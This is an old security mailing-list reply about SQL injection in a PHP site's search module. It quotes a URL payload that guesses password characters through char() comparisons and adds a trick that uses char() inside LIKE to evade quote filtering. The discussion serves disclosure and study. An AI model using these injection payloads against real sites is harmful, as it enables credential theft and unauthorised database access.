hola, On 20 Feb 2003 20:36:11 -0000 Lucas Armstrong <lucas@cgishield.com> wrote: > To get around this problem, one could use the mysql char() > function which will output any ascii value, without using quotes. So to > guess the letter 'a' the hacker could use char(97). Here is an example url > guessing the 3rd character in the pwd column as 'a': > http://site/modules.php? > name=search&query=&topic=&category=&author=&days=1+or+mid(a.pwd,3,1)=char > (97)&type=stories JFYI: this maybe off topic but it worth mentioning .. a couple of month ago we found out that the mysql char() function can be used within the "like() - function" to place quotes. this may help somebody doing sql-injection in an "quote-stripped :-)" environment. example query: ---*--- select id,Name,password from Users where id = 1 and (user() like "%root%"); ---*--- and now "without" quotes: ---*--- select id,Name,password from Users where id = 1 and (user() like char(37,114,111,111,116,37)); ---*--- ... nice day, mEi -- WebSec.org / Martin Eiszner Gurkgasse 49/Top14 1140 Vienna Austria / EUROPE mei@websec.org http://www.websec.org tel: 0043 699 121772 37
